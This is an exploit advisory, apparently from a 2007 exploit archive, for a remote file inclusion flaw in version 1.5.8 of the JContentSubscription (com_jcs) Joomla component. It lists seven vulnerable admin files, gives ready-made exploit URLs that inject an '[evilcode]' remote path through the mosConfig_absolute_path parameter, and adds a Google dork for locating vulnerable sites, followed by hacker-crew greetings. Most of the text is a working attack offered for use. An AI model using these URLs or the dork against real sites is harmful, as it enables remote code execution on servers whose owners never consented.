joomlajcon-rfi.txt
Posted on 11 October 2007
# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability Component : com_jcs version 1.5.8 - payable component Dicovered by : NoGe Contact : pace.noge@hotmail.com ================================================================================================================================== # Vulnerable file /administrator/components/com_jcs/jcs.function.php line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/view/add.php line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/view/history.php line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/view/register.php line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/views/list.sub.html.php line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" ); /administrator/components/com_jcs/views/list.user.sub.html.php line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" ); /administrator/components/com_jcs/views/reports.html.php line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" ); # Exploit http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode] # Google dork inurl:com_jcs ================================================================================================================================== # Greetz all crew #papuahacker #baliemhackerlink #nyubicrew skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq http://kapukvalley.net member ==================================================================================================================================